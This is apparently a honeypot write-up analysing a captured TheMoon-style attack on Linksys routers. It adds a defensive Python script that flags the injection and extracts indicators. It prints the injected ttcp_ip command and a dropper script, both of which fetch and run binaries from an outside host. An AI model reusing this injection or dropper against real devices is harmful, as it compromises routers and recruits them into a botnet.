This payload turned out to be unrelated to WordPress. It targets hndUnblock.cgi on Linksys E-Series routers and injects shell commands through the ttcp_ip parameter (note the backticks wrapping the command chain), with the aim of recruiting the router into a botnet. This is the same CGI and parameter combination the TheMoon worm used against these routers in 2014.
> db.payloads.find({'ip': '179.158.120.213'}).pretty()
{
"_id" : ObjectId("576a421f83932a00168098be"),
"Tor" : false,
"ip" : "179.158.120.213",
"user-agent" : "Wget(linux)",
"triggered_url" : "http://178.62.224.8/hndUnblock.cgi",
"time" : "1466581535",
"payload" : {
"data" : {
"ttcp_ip" : "-h `cd /tmp;rm -f ttp.sh;wget -O ttp.sh http://176.103.48.34:80/ttp.sh;chmod +x ttp.sh;./ttp.sh`",
"ttcp_size" : "2",
"StartEPI" : "1",
"change_action" : "",
"ttcp_num" : "2",
"submit_button" : "",
"action" : "",
"commit" : ""
},
"hash" : "063f0d9affbe842ddf2c9dc1ccc1ba630f14683b1901bd4e11e3e326bc30f5af"
}
}
The injected command drops ttp.sh into /tmp and executes it. The script then fetches two binaries from the same host, marks each executable and runs it, and finally fetches a third file, updok, which it does not run (at least not in the copy served here):
root@780e7ade9793:/# curl -s http://176.103.48.34:80/ttp.sh
#!/bin/sh
cd /tmp
wget http://176.103.48.34/ttp/.nttpd
chmod +x .nttpd
./.nttpd
wget http://176.103.48.34/ttp/.sox
chmod +x .sox
./.sox
wget http://176.103.48.34/ttp/updok
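To turn a capture like the record and dropper above into something actionable, here is an added example (not code from the original post) that flags form fields carrying shell substitution or command separators, pulls out the URLs they reference, and walks the dropper to see which downloaded files are actually executed. The input is the ttcp_ip payload and ttp.sh contents as shown above; the function and variable names are my own.

```python
import re
from urllib.parse import urlparse

# Form fields as captured by the honeypot (copied from the record above).
PAYLOAD_DATA = {
    "ttcp_ip": "-h `cd /tmp;rm -f ttp.sh;wget -O ttp.sh http://176.103.48.34:80/ttp.sh;chmod +x ttp.sh;./ttp.sh`",
    "ttcp_size": "2",
    "StartEPI": "1",
    "change_action": "",
    "ttcp_num": "2",
    "submit_button": "",
    "action": "",
    "commit": "",
}

# The dropper fetched above (copied from the page).
DROPPER = """#!/bin/sh
cd /tmp
wget http://176.103.48.34/ttp/.nttpd
chmod +x .nttpd
./.nttpd
wget http://176.103.48.34/ttp/.sox
chmod +x .sox
./.sox
wget http://176.103.48.34/ttp/updok
"""

# Shell constructs that let a value escape into command position once the CGI
# interpolates it into a system() call: backtick and $(...) substitution, plus
# command separators and pipes.
SUBSTITUTION_RE = re.compile(r"`([^`]*)`|\$\(([^)]*)\)")
SEPARATOR_RE = re.compile(r"\|\||&&|[;|&]")
URL_RE = re.compile(r"https?://[^\s'\"`;|&<>]+")


def find_injections(params):
    """Return (field, injected_command) for every field carrying shell substitution
    or command separators. Values that look like plain arguments are ignored."""
    hits = []
    for field, value in params.items():
        for m in SUBSTITUTION_RE.finditer(value):
            hits.append((field, (m.group(1) or m.group(2)).strip()))
        if not SUBSTITUTION_RE.search(value) and SEPARATOR_RE.search(value):
            hits.append((field, value.strip()))
    return hits


def extract_urls(text):
    """All http(s) URLs in a blob, in order of appearance, without duplicates."""
    seen = []
    for u in URL_RE.findall(text):
        if u not in seen:
            seen.append(u)
    return seen


def parse_dropper(script):
    """Walk a dropper line by line and track which downloaded files are later
    executed. Returns (downloaded, executed) as lists of file names."""
    downloaded, executed = [], []
    for line in script.splitlines():
        tokens = line.strip().split()
        if not tokens:
            continue
        if tokens[0] == "wget":
            # "wget -O name URL" or plain "wget URL" (name is the URL path's last component)
            if "-O" in tokens:
                name = tokens[tokens.index("-O") + 1]
            else:
                name = urlparse(tokens[-1]).path.rsplit("/", 1)[-1]
            downloaded.append(name)
        elif tokens[0].startswith("./") and tokens[0][2:] in downloaded:
            executed.append(tokens[0][2:])
    return downloaded, executed


def iocs(params, script):
    """Everything a responder would block or hunt for: hosts contacted, files dropped and run."""
    urls = extract_urls(" ".join(params.values())) + extract_urls(script)
    hosts = sorted({urlparse(u).hostname for u in urls})
    downloaded, executed = parse_dropper(script)
    return {"hosts": hosts, "urls": urls, "dropped": downloaded, "executed": executed}


if __name__ == "__main__":
    for field, cmd in find_injections(PAYLOAD_DATA):
        print(f"injection via {field!r}: {cmd}")
    print(iocs(PAYLOAD_DATA, DROPPER))
```

The injected command chain itself is a one-line dropper, so splitting it on ";" and feeding it to parse_dropper reports ttp.sh as both fetched and executed; the same tokenizer then shows that .nttpd and .sox are run but updok is only downloaded.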
A quick look at the first binary shows it is dynamically linked against uClibc, the libc most consumer router firmware ships with, which fits an embedded target rather than a WordPress host:
root@780e7ade9793:/# curl -s http://176.103.48.34/ttp/.nttpd | strings | head
/lib/ld-uClibc.so.0
_fini
__uClibc_main
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
__deregister_frame_info
__register_frame_info
_Jv_RegisterClasses
strlen
strstr